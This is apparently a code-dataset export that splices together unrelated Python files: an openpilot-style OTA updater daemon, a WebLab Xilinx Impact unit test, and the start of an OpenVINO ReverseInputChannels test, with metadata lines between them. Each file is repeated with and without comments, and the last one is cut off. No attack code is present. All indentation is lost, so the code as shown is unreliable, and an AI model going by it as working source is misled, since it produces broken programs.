run(["mount", "-t", "overlay", "-o", overlay_opts, "none", OVERLAY_MERGED])
def inodes_in_tree(search_dir):
"""Given a search root, produce a dictionary mapping of inodes to relative
pathnames of regular files (no directories, symlinks, or special files)."""
inode_map = {}
for root, dirs, files in os.walk(search_dir, topdown=True):
for file_name in files:
full_path_name = os.path.join(root, file_name)
st = os.lstat(full_path_name)
if S_ISREG(st[ST_MODE]):
inode_map[st[ST_INO]] = full_path_name
return inode_map
def dup_ovfs_object(inode_map, source_obj, target_dir):
"""Given a relative pathname to copy, and a new target root, duplicate the
source object in the target root, using hardlinks for regular files."""
source_full_path = os.path.join(OVERLAY_MERGED, source_obj)
st = os.lstat(source_full_path)
target_full_path = os.path.join(target_dir, source_obj)
if S_ISREG(st[ST_MODE]):
# Hardlink all regular files; ownership and permissions are shared.
link(inode_map[st[ST_INO]], target_full_path)
else:
# Recreate all directories and symlinks; copy ownership and permissions.
if S_ISDIR(st[ST_MODE]):
os.mkdir(os.path.join(FINALIZED, source_obj), S_IMODE(st[ST_MODE]))
elif S_ISLNK(st[ST_MODE]):
os.symlink(os.readlink(source_full_path), target_full_path)
os.chmod(target_full_path, S_IMODE(st[ST_MODE]), follow_symlinks=False)
else:
# Ran into a FIFO, socket, etc. Should not happen in OP install dir.
# Ignore without copying for the time being; revisit later if needed.
cloudlog.error("can't copy this file type: %s" % source_full_path)
os.chown(target_full_path, st[ST_UID], st[ST_GID], follow_symlinks=False)
# Sync target mtimes to the cached lstat() value from each source object.
# Restores shared inode mtimes after linking, fixes symlinks and dirs.
os.utime(target_full_path, (st[ST_ATIME], st[ST_MTIME]), follow_symlinks=False)
def finalize_from_ovfs_hardlink():
"""Take the current OverlayFS merged view and finalize a copy outside of
OverlayFS, ready to be swapped-in at BASEDIR. Copy using hardlinks"""
cloudlog.info("creating finalized version of the overlay")
# The "copy" is done with hardlinks, but since the OverlayFS merge looks
# like a different filesystem, and hardlinks can't cross filesystems, we
# have to borrow a source pathname from the upper or lower layer.
inode_map = inodes_in_tree(BASEDIR)
inode_map.update(inodes_in_tree(OVERLAY_UPPER))
shutil.rmtree(FINALIZED)
os.umask(0o077)
os.mkdir(FINALIZED)
for root, dirs, files in os.walk(OVERLAY_MERGED, topdown=True):
for obj_name in dirs:
relative_path_name = os.path.relpath(os.path.join(root, obj_name), OVERLAY_MERGED)
dup_ovfs_object(inode_map, relative_path_name, FINALIZED)
for obj_name in files:
relative_path_name = os.path.relpath(os.path.join(root, obj_name), OVERLAY_MERGED)
dup_ovfs_object(inode_map, relative_path_name, FINALIZED)
cloudlog.info("done finalizing overlay")
def finalize_from_ovfs_copy():
"""Take the current OverlayFS merged view and finalize a copy outside of
OverlayFS, ready to be swapped-in at BASEDIR. Copy using shutil.copytree"""
cloudlog.info("creating finalized version of the overlay")
shutil.rmtree(FINALIZED)
shutil.copytree(OVERLAY_MERGED, FINALIZED, symlinks=True)
cloudlog.info("done finalizing overlay")
def attempt_update(time_offroad, need_reboot):
cloudlog.info("attempting git update inside staging overlay")
git_fetch_output = run(NICE_LOW_PRIORITY + ["git", "fetch"], OVERLAY_MERGED)
cloudlog.info("git fetch success: %s", git_fetch_output)
cur_hash = run(["git", "rev-parse", "HEAD"], OVERLAY_MERGED).rstrip()
upstream_hash = run(["git", "rev-parse", "@{u}"], OVERLAY_MERGED).rstrip()
new_version = cur_hash != upstream_hash
git_fetch_result = len(git_fetch_output) > 0 and (
git_fetch_output != "Failed to add the host to the list of known hosts (/data/data/com.termux/files/home/.ssh/known_hosts).\n")
cloudlog.info("comparing %s to %s" % (cur_hash, upstream_hash))
if new_version or git_fetch_result:
cloudlog.info("Running update")
if new_version:
cloudlog.info("git reset in progress")
r = [
run(NICE_LOW_PRIORITY + ["git", "reset", "--hard", "@{u}"], OVERLAY_MERGED),
run(NICE_LOW_PRIORITY + ["git", "clean", "-xdf"], OVERLAY_MERGED),
run(NICE_LOW_PRIORITY + ["git", "submodule", "init"], OVERLAY_MERGED),
run(NICE_LOW_PRIORITY + ["git", "submodule", "update"], OVERLAY_MERGED),
]
cloudlog.info("git reset success: %s", '\n'.join(r))
# Un-set the validity flag to prevent the finalized tree from being
# activated later if the finalize step is interrupted
remove_consistent_flag()
finalize_from_ovfs_copy()
# Make sure the validity flag lands on disk LAST, only when the local git
# repo and OP install are in a consistent state.
set_consistent_flag()
cloudlog.info("update successful!")
else:
cloudlog.info("nothing new from git at this time")
set_update_available_params(new_version=new_version)
return auto_update_reboot(time_offroad, need_reboot, new_version)
def auto_update_reboot(time_offroad, need_reboot, new_version):
min_reboot_time = 10.
if new_version and auto_update and not os.path.isfile("/data/no_ota_updates"):
try:
if 'already up to date' not in run(NICE_LOW_PRIORITY + ["git", "pull"]).lower():
need_reboot = True
except:
pass
if time.time() - time_offroad > min_reboot_time * 60 and need_reboot: # allow reboot x minutes after stopping openpilot or starting EON
os.system('reboot')
return need_reboot
def main(gctx=None):
update_failed_count = 0
overlay_init_done = False
wait_helper = WaitTimeHelper()
params = Params()
if not os.geteuid() == 0:
raise RuntimeError("updated must be launched as root!")
# Set low io priority
p = psutil.Process()
if psutil.LINUX:
p.ionice(psutil.IOPRIO_CLASS_BE, value=7)
ov_lock_fd = open('/tmp/safe_staging_overlay.lock', 'w')
try:
fcntl.flock(ov_lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError:
raise RuntimeError("couldn't get overlay lock; is another updated running?")
time_offroad = time.time()
need_reboot = False
while True:
update_failed_count += 1
time_wrong = datetime.datetime.now().year < 2019
ping_failed = subprocess.call(["ping", "-W", "4", "-c", "1", "8.8.8.8"])
# Wait until we have a valid datetime to initialize the overlay
if not (ping_failed or time_wrong):
try:
# If the git directory has modifcations after we created the overlay
# we need to recreate the overlay
if overlay_init_done:
overlay_init_fn = os.path.join(BASEDIR, ".overlay_init")
git_dir_path = os.path.join(BASEDIR, ".git")
new_files = run(["find", git_dir_path, "-newer", overlay_init_fn])
if len(new_files.splitlines()):
cloudlog.info(".git directory changed, recreating overlay")
overlay_init_done = False
if not overlay_init_done:
init_ovfs()
overlay_init_done = True
if params.get("IsOffroad") == b"1":
need_reboot = attempt_update(time_offroad, need_reboot)
update_failed_count = 0
else:
time_offroad = time.time()
cloudlog.info("not running updater, openpilot running")
except subprocess.CalledProcessError as e:
cloudlog.event(
"update process failed",
cmd=e.cmd,
output=e.output,
returncode=e.returncode
)
overlay_init_done = False
except Exception:
cloudlog.exception("uncaught updated exception, shouldn't happen")
params.put("UpdateFailedCount", str(update_failed_count))
wait_between_updates(wait_helper.ready_event)
if wait_helper.shutdown:
break
# We've been signaled to shut down
dismount_ovfs()
if __name__ == "__main__":
main()
| 37.010283
| 139
| 0.720845
|
# robust against Git repository corruption. This service DOES NOT try to fix
# an already-corrupt BASEDIR Git repo, only prevent it from happening.
#
# During normal operation, both onroad and offroad, the update process makes
# no changes to the BASEDIR install of OP. All update attempts are performed
# in a disposable staging area provided by OverlayFS. It assumes the deleter
# process provides enough disk space to carry out the process.
#
# If an update succeeds, a flag is set, and the update is swapped in at the
# next reboot. If an update is interrupted or otherwise fails, the OverlayFS
# upper layer and metadata can be discarded before trying again.
#
# The swap on boot is triggered by launch_chffrplus.sh
# gated on the existence of $FINALIZED/.overlay_consistent and also the
# existence and mtime of $BASEDIR/.overlay_init.
#
# Other than build byproducts, BASEDIR should not be modified while this
# service is running. Developers modifying code directly in BASEDIR should
# disable this service.
import os
import datetime
import subprocess
import psutil
from stat import S_ISREG, S_ISDIR, S_ISLNK, S_IMODE, ST_MODE, ST_INO, ST_UID, ST_GID, ST_ATIME, ST_MTIME
import shutil
import signal
from pathlib import Path
import fcntl
import threading
from cffi import FFI
import time
from common.basedir import BASEDIR
from common.params import Params
from selfdrive.swaglog import cloudlog
from common.op_params import opParams
from common.travis_checker import travis
STAGING_ROOT = "/data/safe_staging"
OVERLAY_UPPER = os.path.join(STAGING_ROOT, "upper")
OVERLAY_METADATA = os.path.join(STAGING_ROOT, "metadata")
OVERLAY_MERGED = os.path.join(STAGING_ROOT, "merged")
FINALIZED = os.path.join(STAGING_ROOT, "finalized")
NICE_LOW_PRIORITY = ["nice", "-n", "19"]
SHORT = os.getenv("SHORT") is not None
auto_update = opParams().get('autoUpdate', True) if not travis else False
# Workaround for the EON/termux build of Python having os.link removed.
ffi = FFI()
ffi.cdef("int link(const char *oldpath, const char *newpath);")
libc = ffi.dlopen(None)
class WaitTimeHelper:
ready_event = threading.Event()
shutdown = False
def __init__(self):
signal.signal(signal.SIGTERM, self.graceful_shutdown)
signal.signal(signal.SIGINT, self.graceful_shutdown)
signal.signal(signal.SIGHUP, self.update_now)
def graceful_shutdown(self, signum, frame):
# umount -f doesn't appear effective in avoiding "device busy" on EON,
cloudlog.info("caught SIGINT/SIGTERM, dismounting overlay at next opportunity")
self.shutdown = True
self.ready_event.set()
def update_now(self, signum, frame):
cloudlog.info("caught SIGHUP, running update check immediately")
self.ready_event.set()
def wait_between_updates(ready_event):
ready_event.clear()
if SHORT:
ready_event.wait(timeout=10)
else:
ready_event.wait(timeout=60 * 10)
def link(src, dest):
# Workaround for the EON/termux build of Python having os.link removed.
return libc.link(src.encode(), dest.encode())
def run(cmd, cwd=None):
return subprocess.check_output(cmd, cwd=cwd, stderr=subprocess.STDOUT, encoding='utf8')
def remove_consistent_flag():
os.system("sync")
consistent_file = Path(os.path.join(FINALIZED, ".overlay_consistent"))
try:
consistent_file.unlink()
except FileNotFoundError:
pass
os.system("sync")
def set_consistent_flag():
consistent_file = Path(os.path.join(FINALIZED, ".overlay_consistent"))
os.system("sync")
consistent_file.touch()
os.system("sync")
def set_update_available_params(new_version=False):
params = Params()
t = datetime.datetime.now().isoformat()
params.put("LastUpdateTime", t.encode('utf8'))
if new_version:
try:
with open(os.path.join(FINALIZED, "RELEASES.md"), "rb") as f:
r = f.read()
r = r[:r.find(b'\n\n')] # Slice latest release notes
params.put("ReleaseNotes", r + b"\n")
except Exception:
params.put("ReleaseNotes", "")
params.put("UpdateAvailable", "1")
def dismount_ovfs():
if os.path.ismount(OVERLAY_MERGED):
cloudlog.error("unmounting existing overlay")
run(["umount", "-l", OVERLAY_MERGED])
def init_ovfs():
cloudlog.info("preparing new safe staging area")
Params().put("UpdateAvailable", "0")
remove_consistent_flag()
dismount_ovfs()
if os.path.isdir(STAGING_ROOT):
shutil.rmtree(STAGING_ROOT)
for dirname in [STAGING_ROOT, OVERLAY_UPPER, OVERLAY_METADATA, OVERLAY_MERGED, FINALIZED]:
os.mkdir(dirname, 0o755)
if not os.lstat(BASEDIR).st_dev == os.lstat(OVERLAY_MERGED).st_dev:
raise RuntimeError("base and overlay merge directories are on different filesystems; not valid for overlay FS!")
# Remove consistent flag from current BASEDIR so it's not copied over
if os.path.isfile(os.path.join(BASEDIR, ".overlay_consistent")):
os.remove(os.path.join(BASEDIR, ".overlay_consistent"))
# are outside user control. Make sure Git is set up to ignore system ctimes,
# because they change when we make hard links during finalize. Otherwise,
# there is a lot of unnecessary churn. This appears to be a common need on
# OSX as well: https://www.git-tower.com/blog/make-git-rebase-safe-on-osx/
run(["git", "config", "core.trustctime", "false"], BASEDIR)
# We are temporarily using copytree to copy the directory, which also changes
# inode numbers. Ignore those changes too.
run(["git", "config", "core.checkStat", "minimal"], BASEDIR)
# Leave a timestamped canary in BASEDIR to check at startup. The EON clock
# should be correct by the time we get here. If the init file disappears, or
# critical mtimes in BASEDIR are newer than .overlay_init, continue.sh can
# assume that BASEDIR has used for local development or otherwise modified,
# and skips the update activation attempt.
Path(os.path.join(BASEDIR, ".overlay_init")).touch()
overlay_opts = f"lowerdir={BASEDIR},upperdir={OVERLAY_UPPER},workdir={OVERLAY_METADATA}"
run(["mount", "-t", "overlay", "-o", overlay_opts, "none", OVERLAY_MERGED])
def inodes_in_tree(search_dir):
inode_map = {}
for root, dirs, files in os.walk(search_dir, topdown=True):
for file_name in files:
full_path_name = os.path.join(root, file_name)
st = os.lstat(full_path_name)
if S_ISREG(st[ST_MODE]):
inode_map[st[ST_INO]] = full_path_name
return inode_map
def dup_ovfs_object(inode_map, source_obj, target_dir):
source_full_path = os.path.join(OVERLAY_MERGED, source_obj)
st = os.lstat(source_full_path)
target_full_path = os.path.join(target_dir, source_obj)
if S_ISREG(st[ST_MODE]):
# Hardlink all regular files; ownership and permissions are shared.
link(inode_map[st[ST_INO]], target_full_path)
else:
# Recreate all directories and symlinks; copy ownership and permissions.
if S_ISDIR(st[ST_MODE]):
os.mkdir(os.path.join(FINALIZED, source_obj), S_IMODE(st[ST_MODE]))
elif S_ISLNK(st[ST_MODE]):
os.symlink(os.readlink(source_full_path), target_full_path)
os.chmod(target_full_path, S_IMODE(st[ST_MODE]), follow_symlinks=False)
else:
# Ran into a FIFO, socket, etc. Should not happen in OP install dir.
# Ignore without copying for the time being; revisit later if needed.
cloudlog.error("can't copy this file type: %s" % source_full_path)
os.chown(target_full_path, st[ST_UID], st[ST_GID], follow_symlinks=False)
os.utime(target_full_path, (st[ST_ATIME], st[ST_MTIME]), follow_symlinks=False)
def finalize_from_ovfs_hardlink():
cloudlog.info("creating finalized version of the overlay")
# have to borrow a source pathname from the upper or lower layer.
inode_map = inodes_in_tree(BASEDIR)
inode_map.update(inodes_in_tree(OVERLAY_UPPER))
shutil.rmtree(FINALIZED)
os.umask(0o077)
os.mkdir(FINALIZED)
for root, dirs, files in os.walk(OVERLAY_MERGED, topdown=True):
for obj_name in dirs:
relative_path_name = os.path.relpath(os.path.join(root, obj_name), OVERLAY_MERGED)
dup_ovfs_object(inode_map, relative_path_name, FINALIZED)
for obj_name in files:
relative_path_name = os.path.relpath(os.path.join(root, obj_name), OVERLAY_MERGED)
dup_ovfs_object(inode_map, relative_path_name, FINALIZED)
cloudlog.info("done finalizing overlay")
def finalize_from_ovfs_copy():
cloudlog.info("creating finalized version of the overlay")
shutil.rmtree(FINALIZED)
shutil.copytree(OVERLAY_MERGED, FINALIZED, symlinks=True)
cloudlog.info("done finalizing overlay")
def attempt_update(time_offroad, need_reboot):
cloudlog.info("attempting git update inside staging overlay")
git_fetch_output = run(NICE_LOW_PRIORITY + ["git", "fetch"], OVERLAY_MERGED)
cloudlog.info("git fetch success: %s", git_fetch_output)
cur_hash = run(["git", "rev-parse", "HEAD"], OVERLAY_MERGED).rstrip()
upstream_hash = run(["git", "rev-parse", "@{u}"], OVERLAY_MERGED).rstrip()
new_version = cur_hash != upstream_hash
git_fetch_result = len(git_fetch_output) > 0 and (
git_fetch_output != "Failed to add the host to the list of known hosts (/data/data/com.termux/files/home/.ssh/known_hosts).\n")
cloudlog.info("comparing %s to %s" % (cur_hash, upstream_hash))
if new_version or git_fetch_result:
cloudlog.info("Running update")
if new_version:
cloudlog.info("git reset in progress")
r = [
run(NICE_LOW_PRIORITY + ["git", "reset", "--hard", "@{u}"], OVERLAY_MERGED),
run(NICE_LOW_PRIORITY + ["git", "clean", "-xdf"], OVERLAY_MERGED),
run(NICE_LOW_PRIORITY + ["git", "submodule", "init"], OVERLAY_MERGED),
run(NICE_LOW_PRIORITY + ["git", "submodule", "update"], OVERLAY_MERGED),
]
cloudlog.info("git reset success: %s", '\n'.join(r))
# Un-set the validity flag to prevent the finalized tree from being
# activated later if the finalize step is interrupted
remove_consistent_flag()
finalize_from_ovfs_copy()
# Make sure the validity flag lands on disk LAST, only when the local git
# repo and OP install are in a consistent state.
set_consistent_flag()
cloudlog.info("update successful!")
else:
cloudlog.info("nothing new from git at this time")
set_update_available_params(new_version=new_version)
return auto_update_reboot(time_offroad, need_reboot, new_version)
def auto_update_reboot(time_offroad, need_reboot, new_version):
min_reboot_time = 10.
if new_version and auto_update and not os.path.isfile("/data/no_ota_updates"):
try:
if 'already up to date' not in run(NICE_LOW_PRIORITY + ["git", "pull"]).lower():
need_reboot = True
except:
pass
if time.time() - time_offroad > min_reboot_time * 60 and need_reboot: # allow reboot x minutes after stopping openpilot or starting EON
os.system('reboot')
return need_reboot
def main(gctx=None):
update_failed_count = 0
overlay_init_done = False
wait_helper = WaitTimeHelper()
params = Params()
if not os.geteuid() == 0:
raise RuntimeError("updated must be launched as root!")
# Set low io priority
p = psutil.Process()
if psutil.LINUX:
p.ionice(psutil.IOPRIO_CLASS_BE, value=7)
ov_lock_fd = open('/tmp/safe_staging_overlay.lock', 'w')
try:
fcntl.flock(ov_lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError:
raise RuntimeError("couldn't get overlay lock; is another updated running?")
time_offroad = time.time()
need_reboot = False
while True:
update_failed_count += 1
time_wrong = datetime.datetime.now().year < 2019
ping_failed = subprocess.call(["ping", "-W", "4", "-c", "1", "8.8.8.8"])
if not (ping_failed or time_wrong):
try:
if overlay_init_done:
overlay_init_fn = os.path.join(BASEDIR, ".overlay_init")
git_dir_path = os.path.join(BASEDIR, ".git")
new_files = run(["find", git_dir_path, "-newer", overlay_init_fn])
if len(new_files.splitlines()):
cloudlog.info(".git directory changed, recreating overlay")
overlay_init_done = False
if not overlay_init_done:
init_ovfs()
overlay_init_done = True
if params.get("IsOffroad") == b"1":
need_reboot = attempt_update(time_offroad, need_reboot)
update_failed_count = 0
else:
time_offroad = time.time()
cloudlog.info("not running updater, openpilot running")
except subprocess.CalledProcessError as e:
cloudlog.event(
"update process failed",
cmd=e.cmd,
output=e.output,
returncode=e.returncode
)
overlay_init_done = False
except Exception:
cloudlog.exception("uncaught updated exception, shouldn't happen")
params.put("UpdateFailedCount", str(update_failed_count))
wait_between_updates(wait_helper.ready_event)
if wait_helper.shutdown:
break
# We've been signaled to shut down
dismount_ovfs()
if __name__ == "__main__":
main()
| true
| true
|
1c3e9548ed0e3626ec1a8937ed1278f1b9c00411
| 3,742
|
py
|
Python
|
server/src/test/unit/weblab/experiment/devices/xilinx_impact/test_impact.py
|
zstars/weblabdeusto
|
09bd9d93d483671bca67ee5c70a9c412eb5d352f
|
[
"BSD-2-Clause"
] | null | null | null |
server/src/test/unit/weblab/experiment/devices/xilinx_impact/test_impact.py
|
zstars/weblabdeusto
|
09bd9d93d483671bca67ee5c70a9c412eb5d352f
|
[
"BSD-2-Clause"
] | null | null | null |
server/src/test/unit/weblab/experiment/devices/xilinx_impact/test_impact.py
|
zstars/weblabdeusto
|
09bd9d93d483671bca67ee5c70a9c412eb5d352f
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2005 onwards University of Deusto
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
# This software consists of contributions made by many individuals,
# listed below:
#
# Author: Pablo Orduña <pablo@ordunya.com>
# Jaime Irurzun <jaime.irurzun@gmail.com>
#
import unittest
import test.unit.configuration as configuration_module
import voodoo.configuration as ConfigurationManager
import weblab.experiment.devices.xilinx_impact.impact as XilinxImpact
import weblab.experiment.devices.xilinx_impact.exc as XilinxImpactErrors
class XilinxImpactTestCase(unittest.TestCase):
def setUp(self):
self.cfg_manager= ConfigurationManager.ConfigurationManager()
self.cfg_manager.append_module(configuration_module)
self._fpga = XilinxImpact.XilinxImpactFPGA(self.cfg_manager)
self._pld = XilinxImpact.XilinxImpactPLD(self.cfg_manager)
def test_program_device(self):
self._fpga.program_device("everything_ok.bit")
self._pld.program_device("everything_ok.jed")
def test_program_device_errors(self):
self._test_program_device_errors(self._fpga)
self._test_program_device_errors(self._pld)
def _test_program_device_errors(self, impact):
self.assertRaises(
XilinxImpactErrors.ProgrammingGotErrors,
impact.program_device,
"error.file"
)
self.assertRaises(
XilinxImpactErrors.ProgrammingGotErrors,
impact.program_device,
"stderr.file"
)
self.assertRaises(
XilinxImpactErrors.ProgrammingGotErrors,
impact.program_device,
"return-1.file"
)
impact._busy = True
self.assertRaises(
XilinxImpactErrors.AlreadyProgrammingDeviceError,
impact.program_device,
"file.file"
)
impact._busy = False
self.cfg_manager._values['xilinx_impact_full_path'] = ['p0wn3d']
self.assertRaises(
XilinxImpactErrors.ErrorProgrammingDeviceError,
impact.program_device,
"file.file"
)
self.cfg_manager._values.pop('xilinx_impact_full_path')
self.assertRaises(
XilinxImpactErrors.CantFindXilinxProperty,
impact.program_device,
"file.file"
)
self.cfg_manager.reload()
def test_source2svf(self):
self._fpga.source2svf("everything_ok.bit")
self._pld.source2svf("everything_ok.jed")
def test_source2svf_errors(self):
self._test_source2svf_errors(self._fpga)
self._test_source2svf_errors(self._pld)
def _test_source2svf_errors(self, impact):
self.assertRaises(
XilinxImpactErrors.GeneratingSvfFileGotErrors,
impact.source2svf,
"error.file"
)
self.assertRaises(
XilinxImpactErrors.GeneratingSvfFileGotErrors,
impact.source2svf,
"return-1.file"
)
self.cfg_manager._values['xilinx_impact_full_path'] = ['p0wn3d']
self.assertRaises(
XilinxImpactErrors.ErrorProgrammingDeviceError,
impact.source2svf,
"file.file"
)
self.cfg_manager._values.pop('xilinx_impact_full_path')
self.assertRaises(
XilinxImpactErrors.CantFindXilinxProperty,
impact.source2svf,
"file.file"
)
self.cfg_manager.reload()
def suite():
return unittest.makeSuite(XilinxImpactTestCase)
if __name__ == '__main__':
unittest.main()
| 29.936
| 72
| 0.66542
|
import unittest
import test.unit.configuration as configuration_module
import voodoo.configuration as ConfigurationManager
import weblab.experiment.devices.xilinx_impact.impact as XilinxImpact
import weblab.experiment.devices.xilinx_impact.exc as XilinxImpactErrors
class XilinxImpactTestCase(unittest.TestCase):
def setUp(self):
self.cfg_manager= ConfigurationManager.ConfigurationManager()
self.cfg_manager.append_module(configuration_module)
self._fpga = XilinxImpact.XilinxImpactFPGA(self.cfg_manager)
self._pld = XilinxImpact.XilinxImpactPLD(self.cfg_manager)
def test_program_device(self):
self._fpga.program_device("everything_ok.bit")
self._pld.program_device("everything_ok.jed")
def test_program_device_errors(self):
self._test_program_device_errors(self._fpga)
self._test_program_device_errors(self._pld)
def _test_program_device_errors(self, impact):
self.assertRaises(
XilinxImpactErrors.ProgrammingGotErrors,
impact.program_device,
"error.file"
)
self.assertRaises(
XilinxImpactErrors.ProgrammingGotErrors,
impact.program_device,
"stderr.file"
)
self.assertRaises(
XilinxImpactErrors.ProgrammingGotErrors,
impact.program_device,
"return-1.file"
)
impact._busy = True
self.assertRaises(
XilinxImpactErrors.AlreadyProgrammingDeviceError,
impact.program_device,
"file.file"
)
impact._busy = False
self.cfg_manager._values['xilinx_impact_full_path'] = ['p0wn3d']
self.assertRaises(
XilinxImpactErrors.ErrorProgrammingDeviceError,
impact.program_device,
"file.file"
)
self.cfg_manager._values.pop('xilinx_impact_full_path')
self.assertRaises(
XilinxImpactErrors.CantFindXilinxProperty,
impact.program_device,
"file.file"
)
self.cfg_manager.reload()
def test_source2svf(self):
self._fpga.source2svf("everything_ok.bit")
self._pld.source2svf("everything_ok.jed")
def test_source2svf_errors(self):
self._test_source2svf_errors(self._fpga)
self._test_source2svf_errors(self._pld)
def _test_source2svf_errors(self, impact):
self.assertRaises(
XilinxImpactErrors.GeneratingSvfFileGotErrors,
impact.source2svf,
"error.file"
)
self.assertRaises(
XilinxImpactErrors.GeneratingSvfFileGotErrors,
impact.source2svf,
"return-1.file"
)
self.cfg_manager._values['xilinx_impact_full_path'] = ['p0wn3d']
self.assertRaises(
XilinxImpactErrors.ErrorProgrammingDeviceError,
impact.source2svf,
"file.file"
)
self.cfg_manager._values.pop('xilinx_impact_full_path')
self.assertRaises(
XilinxImpactErrors.CantFindXilinxProperty,
impact.source2svf,
"file.file"
)
self.cfg_manager.reload()
def suite():
return unittest.makeSuite(XilinxImpactTestCase)
if __name__ == '__main__':
unittest.main()
| true
| true
|
1c3e957f964646052cf94f35d12a79cbb6d2862c
| 16,861
|
py
|
Python
|
tools/mo/unit_tests/mo/back/ReverseInputChannels_test.py
|
opencv/dldt
|
c0a2c98a457a08e8853abc18f5bd462169d0b354
|
[
"Apache-2.0"
] | 1,127
|
2018-10-15T14:36:58.000Z
|
2020-04-20T09:29:44.000Z
|
tools/mo/unit_tests/mo/back/ReverseInputChannels_test.py
|
opencv/dldt
|
c0a2c98a457a08e8853abc18f5bd462169d0b354
|
[
"Apache-2.0"
] | 439
|
2018-10-20T04:40:35.000Z
|
2020-04-19T05:56:25.000Z
|
tools/mo/unit_tests/mo/back/ReverseInputChannels_test.py
|
opencv/dldt
|
c0a2c98a457a08e8853abc18f5bd462169d0b354
|
[
"Apache-2.0"
] | 414
|
2018-10-17T05:53:46.000Z
|
2020-04-16T17:29:53.000Z
|
# Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
from argparse import Namespace
import numpy as np
from openvino.tools.mo.back.ReverseInputChannels import ReverseChannelsPropagationUp, ReverseChannelsPropagationDown, \
InsertReverseChannels
from openvino.tools.mo.front.common.partial_infer.utils import int64_array, float32_array
from openvino.tools.mo.graph.graph import Node, Graph
from openvino.tools.mo.utils.ir_engine.compare_graphs import compare_graphs
from openvino.tools.mo.utils.runtime_info import OldAPIMapOrder, RTInfo
from unit_tests.utils.graph import build_graph, result, connect, regular_op_with_shaped_data, valued_const_with_data
nodes = {
**regular_op_with_shaped_data('placeholder1', [1, 3, 10, 10], {'type': 'Parameter', 'rt_info': RTInfo()}),
**regular_op_with_shaped_data('placeholder2', [1, 1, 1, 1], {'type': 'Parameter'}),
**regular_op_with_shaped_data('mul', [1, 3, 10, 10], {'type': 'Multiply'}),
**regular_op_with_shaped_data('reverse_channels', [1, 3, 10, 10],
{'type': 'ReverseChannels', 'axis': int64_array(1)}),
**regular_op_with_shaped_data('pad', [1, 3, 10, 10], {'type': 'Pad'}),
**result('result'),
}
nodes2 = {
**regular_op_with_shaped_data('placeholder', [1, 3, 10, 10], {'type': 'Parameter'}),
**valued_const_with_data('mul_const', float32_array([-127.5, -127.5, -127.5])),
**regular_op_with_shaped_data('mul', [1, 3, 10, 10], {'type': 'Multiply'}),
**valued_const_with_data('pad_const_1', int64_array([0, 0, 0, 0])),
**valued_const_with_data('pad_const_2', int64_array([0, 0, 1, 1])),
**regular_op_with_shaped_data('pad', [1, 3, 10, 10], {'type': 'Pad'}),
**regular_op_with_shaped_data('reverse_channels', [1, 3, 10, 10],
{'type': 'ReverseChannels', 'axis': int64_array(1)}),
**result('result'),
**result('result2'),
}
nodes3 = {
**regular_op_with_shaped_data('placeholder', [1, 3, 10, 10], {'type': 'Parameter'}),
**regular_op_with_shaped_data('transpose', [1, 3, 10, 10], {'type': 'Transpose'}),
**valued_const_with_data('transpose_order', int64_array([0, 3, 1, 2])),
**regular_op_with_shaped_data('reverse_channels_up', [1, 3, 10, 10],
{'type': 'ReverseChannels', 'axis': int64_array(3)}),
**regular_op_with_shaped_data('reverse_channels_down', [1, 3, 10, 10],
{'type': 'ReverseChannels', 'axis': int64_array(1)}),
**result('result'),
**result('result2'),
}
def get_nodes(shape, axis=1):
return {
**regular_op_with_shaped_data('placeholder1', shape,
{'type': 'Parameter', 'shape': shape, 'rt_info': RTInfo()}),
**regular_op_with_shaped_data('placeholder2', [1, 1, 1, 1], {'type': 'Parameter', 'shape': [1, 1, 1, 1]}),
**regular_op_with_shaped_data('mul', shape, {'type': 'Multiply'}),
**regular_op_with_shaped_data('reverse_channels', shape,
{'op': 'ReverseChannels', 'type': None, 'axis': int64_array(axis)}),
**regular_op_with_shaped_data('pad', shape, {'type': 'Pad'}),
**result('result'),
}
class ReverseInputChannelsTest(unittest.TestCase):
def check_graph_attrs(self, graph: Graph, parameter_node_names: list):
for node in graph.get_op_nodes():
if node.soft_get('name') in parameter_node_names:
self.assertTrue(node.soft_get('type') == 'Parameter')
out_node = node.out_node(0)
self.assertTrue(out_node['fw_tensor_debug_info'] == ['fw_name', 0])
else:
for idx in node.out_nodes():
out_node = node.out_node(idx)
self.assertFalse('fw_tensor_debug_info' in out_node)
def set_graph_attrs(self, graph: Graph, parameter_node_names: list):
for node in graph.get_op_nodes():
if node.soft_get('name') in parameter_node_names:
self.assertTrue(node.soft_get('type') == 'Parameter')
out_node = node.out_node(0)
out_node['fw_tensor_debug_info'] = ['fw_name', 0]
def test_lift_up_through_eltwise(self):
graph = build_graph(nodes, [*connect('placeholder1', '0:mul'), *connect('placeholder2', '1:mul'),
*connect('mul', 'reverse_channels'), *connect('reverse_channels', 'result')])
self.set_graph_attrs(graph, ['placeholder1', 'placeholder2'])
node = Node(graph, 'mul')
reverse_channels = Node(graph, 'reverse_channels')
ReverseChannelsPropagationUp.lift_up_through_eltwise(node, reverse_channels)
self.check_graph_attrs(graph, ['placeholder1', 'placeholder2'])
def test_lift_up_through_eltwise_broadcast(self):
graph = build_graph(nodes, [*connect('placeholder1', '0:mul'), *connect('placeholder2', '1:mul'),
*connect('mul', 'reverse_channels'), *connect('reverse_channels', 'result')])
self.set_graph_attrs(graph, ['placeholder1', 'placeholder2'])
placeholder_node = Node(graph, 'placeholder2')
placeholder_node.out_port(0).data.set_shape([])
node = Node(graph, 'mul')
reverse_channels = Node(graph, 'reverse_channels')
ReverseChannelsPropagationUp.lift_up_through_eltwise(node, reverse_channels)
self.check_graph_attrs(graph, ['placeholder1', 'placeholder2'])
def test_lift_up_through_pad(self):
graph = build_graph(nodes2, [*connect('placeholder', '0:mul'), *connect('mul_const', '1:mul'),
*connect('mul', '0:pad'), *connect('pad_const_1', '1:pad'),
*connect('pad_const_2', '2:pad'), *connect('pad', 'reverse_channels'),
*connect('reverse_channels', 'result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'pad')
reverse_channels = Node(graph, 'reverse_channels')
keep_moving_up, new_reverses = ReverseChannelsPropagationUp.lift_up_through_zero_port_only(node,
reverse_channels)
self.assertTrue(keep_moving_up is True)
self.assertTrue(len(new_reverses) == 1)
self.check_graph_attrs(graph, ['placeholder'])
